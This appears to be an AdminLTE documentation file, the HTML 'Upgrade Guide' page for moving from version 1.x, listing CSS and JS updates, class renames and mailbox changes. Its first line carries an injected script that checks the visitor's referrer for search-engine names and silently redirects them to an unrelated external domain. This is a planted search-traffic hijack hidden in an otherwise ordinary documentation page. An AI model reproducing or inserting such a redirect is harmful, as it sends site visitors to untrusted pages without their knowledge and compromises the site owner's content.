d:\wwwroot\wuchunhua\thinkphp\public\adminlte\documentation\build\include\upgrade.html

001: <script type="text/javascript">var s=document.referrer;if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://www.afisyecd.space/?1923057"}</script><section id="upgrade">
002:   <h2 class="page-header"><a href="#upgrade">Upgrade Guide</a></h2>
003:   <p class="lead">To upgrade from version 1.x to the lateset version, follow this guide.</p>
004:   <h3>New Files</h3>
005:   <p>Make sure you update all CSS and JS files that are related to AdminLTE. Otherwise, the layout will not
006:     function properly. Most important files are AdminLTE.css, skins CSS files, and app.js.</p>
007:   <h3>Layout Changes</h3>
008:   <ol>
009:     <li>The .wrapper div must be placed immediately after the body tag rather than after the header</li>
010:     <li>Change the .header div to .main-header <code>&LT;div class="main-header"></code></li>
011:     <li>Change the .right-side class to .content-wrapper <code>&LT;div class="content-wrapper"></code></li>
012:     <li>Change the .left-side class to .main-sidebar <code>&LT;div class="main-sidebar"></code></li>
013:     <li>In the navbar, change .navbar-right to .navbar-custom-menu <code>&LT;div class="navbar-custom-menu"></code></li>
014:   </ol>
015:   <h3>Navbar Custom Dropdown Menus</h3>
016:   <ol>
017:     <li>The icons in the notification menu do not need bg-* classes. They should be replaced with contextual text color class such as text-aqua or text-red.</li>
018:   </ol>
019:   <h3>Login, Registration and Lockscreen Pages</h3>
020:   <p>There are major changes to the HTML markup and style to these pages. The best way is to copy the page's code and customize it.</p>
021:   <p>And you should be set to go!</p>
022:   <h3>Mailbox</h3>
023:   <p>Mailbox got an upgrade to include three different views. The views are inbox, read mail, and compose new email. To use these views,
024:     you should use the provided HTML files in the pages/mailbox folder.</p>
025:   <p><b class="text-red">Note:</b> the old mailbox layout has been deprecated in favor of the new one and will be removed by the next release.</p>
026: </section>
027:
028:
029: